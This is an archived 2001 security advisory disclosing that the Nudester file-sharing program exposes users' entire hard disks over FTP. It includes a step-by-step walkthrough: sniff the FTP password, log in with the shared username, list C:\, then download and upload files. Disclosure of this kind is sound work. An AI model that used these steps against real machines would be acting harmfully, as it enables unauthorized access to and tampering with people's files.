<-------------------------> [Real Security Advisory #1] [ Author: Cyph3r ] [ www.Real-Security.org ] [ Date: 08/16/2001 ] <-------------------------> [Vulnerable: ] [Nudester 1.10(and below?)] [ OS: Win9x/me/2k/nt/xp ] [ Site: www.nudester.org ] <-------------------------> -> Severity: Malicious users can gain full access to the users Files (upload/download) -> Overview: Nudester, a file sharing program for porn uses the FTP protocol to transfer files, The problem is it gives access to the whole hard disk instead of just the folder containing porn. Example: Open Nudester, and a sniffer program IE: Iris(www.eeye.com) and download a file from a user on Nudester While having the sniffer running filtering port 21 inclusive so you can get the password. <Sniffed Data> 220 ICS FTP Server ready user NUDESTER 331 Password required for NUDESTER pass NSASTdfg!"#.%&sd3214894231SDFGSD598502534 230 User NUDESTER logged in </Sniffed data> Open an ftp client and connect to the ip ftp> open ***.***.***.*** Connected to ***.***.***.*** 220 ICS FTP Server ready. User (***.***.***.***:(none)): NUDESTER 331 Password required for NUDESTER. Password: NSASTdfg!"#.%&sd3214894231SDFGSD598502534 230 User NUDESTER logged in. - Bingo! ftp> dir 200 Port command successful. 150 Opening data connection for directory list. C:\TEMP\*.* not found 226 File sent ok ftp: 23 bytes received in 0.04Seconds 0.57Kbytes/sec. ftp> cd .. 250 CWD command successful. "C:/" is current directory. ftp> DIR 200 Port command successful. 150 Opening data connection for directory list. -rw-rw-rw- 1 ftp ftp 1152 Oct 30 2000 FRUNLOG.TXT -rwxrwxrwx 1 ftp ftp 25473 May 15 1998 MSCDEX.EXE -rw-rw-rw- 1 ftp ftp 10604 May 15 1997 CDROM.SYS -rwxrwxrwx 1 ftp ftp 20135 May 15 1998 KEYB.COM -rw-rw-rw- 1 ftp ftp 34566 May 15 1998 KEYBOARD.SYS -rwxrwxrwx 1 ftp ftp 71102 May 15 1998 EDIT.COM -rw-rw-rw- 1 ftp ftp 38 Oct 16 1998 AUTOEXEC.OLD -rw-rw-rw- 1 ftp ftp 31 Oct 16 1998 CONFIG.OLD drw-rw-rw- 1 ftp ftp 0 Oct 30 2030 ATI -rw-rw-rw- 1 ftp ftp 121 Oct 29 2000 CONFIG.DOS -rw-rw-rw- 1 ftp ftp 113 Oct 29 2000 AUTOEXEC.DOS -rw-rw-rw- 1 ftp ftp 436 Nov 18 2000 AUTOEXEC.BAK drw-rw-rw- 1 ftp ftp 0 Oct 29 2000 WINDOWS drw-rw-rw- 1 ftp ftp 0 Oct 30 2000 WINDOWS.000 -rw-rw-rw- 1 ftp ftp 7471 Nov 18 2000 NETLOG.TXT -rw-rw-rw- 1 ftp ftp 172 Nov 15 2000 CONFIG.BAK -rw-rw-rw- 1 ftp ftp 5048 Nov 17 2000 SETUPXLG.TXT -rwxrwxrwx 1 ftp ftp 438 Aug 16 00:43 AUTOEXEC.BAT dr--r--r-- 1 ftp ftp 0 Oct 29 2000 Program Files -rw-rw-rw- 1 ftp ftp 172 Nov 18 2000 CONFIG.SYS -rw-rw-rw- 1 ftp ftp 19622 Aug 10 18:50 SCANDISK.LOG -rw-rw-rw- 1 ftp ftp 327 Oct 30 2030 outreg.txt -rw-rw-rw- 1 ftp ftp 339 Oct 30 2030 outreg.ini drw-rw-rw- 1 ftp ftp 0 Oct 30 2030 dcpt -rwxrwxrwx 1 ftp ftp 17129 Oct 30 2030 BOOTDISK.EXE -rwxrwxrwx 1 ftp ftp 2884286 Oct 30 2030 DECOMP.EXE -rwxrwxrwx 1 ftp ftp 265420 Oct 30 2030 DOS4GW.EXE -rw-rw-rw- 1 ftp ftp 507 Oct 30 2030 FILE_ID.DIZ -rw-rw-rw- 1 ftp ftp 2086 Oct 30 2030 HELPME.DOC -rw-rw-rw- 1 ftp ftp 3639 Oct 30 2030 LICENSE.DOC -rw-rw-rw- 1 ftp ftp 1377 Oct 30 2030 ORDER.DOC drw-rw-rw- 1 ftp ftp 0 Nov 02 2000 KPCMS -rw-rw-rw- 1 ftp ftp 386 Nov 02 2000 AUTOEXEC.001 drw-rw-rw- 1 ftp ftp 0 Nov 02 2000 psfonts -rw-rw-rw- 1 ftp ftp 25 Nov 03 2000 prompt -rwxrwxrwx 1 ftp ftp 95874 May 05 1999 COMMAND.COM drw-rw-rw- 1 ftp ftp 0 Nov 19 2000 Winzip drw-rw-rw- 1 ftp ftp 0 Dec 10 2000 unzipped drw-rw-rw- 1 ftp ftp 0 Nov 19 2000 Antivirus drw-rw-rw- 1 ftp ftp 0 Dec 16 2000 My Music -rw-rw-rw- 1 ftp ftp 118 Jan 20 00:27 netsig.txt drw-rw-rw- 1 ftp ftp 0 Mar 15 21:05 accelerator -rw-rw-rw- 1 ftp ftp 22721 Aug 17 01:00 winzip.log 226 File sent ok ftp: 4652 bytes received in 5.64Seconds 0.83Kbytes/sec. - Lets see if we have access to download a file ftp> get netsig.txt 200 Port command successful. 150 Opening data connection for netsig.txt. 226 File sent ok ftp: 118 bytes received in 0.00Seconds 118000.00Kbytes/sec. - Yep, let's try to upload a file ftp> put c:\temp.txt 200 Port command successful. 150 Opening data connection for TEMP.TXT. 226 File received ok -> Conclusion: anyone can gain full access to Nudester user's files; the username is the same for every user However the password is not the same, you will have to sniff while downloading a file to retrieve the password, The only solution to this problem is not to use Nudester. -> Credits: Cyph3r - Cyph3rat_private -> Greets: Pseudo, lice_, Electro, Deleted, Venomous, c0redump, acid, spasms, trew, zeronine, matt, shizniz, z0mb1e b0b, neonfreon, dragnet, c0de, spiked and anyone else i missed.
This archive was generated by hypermail 2b30 : Fri Aug 17 2001 - 07:35:53 PDT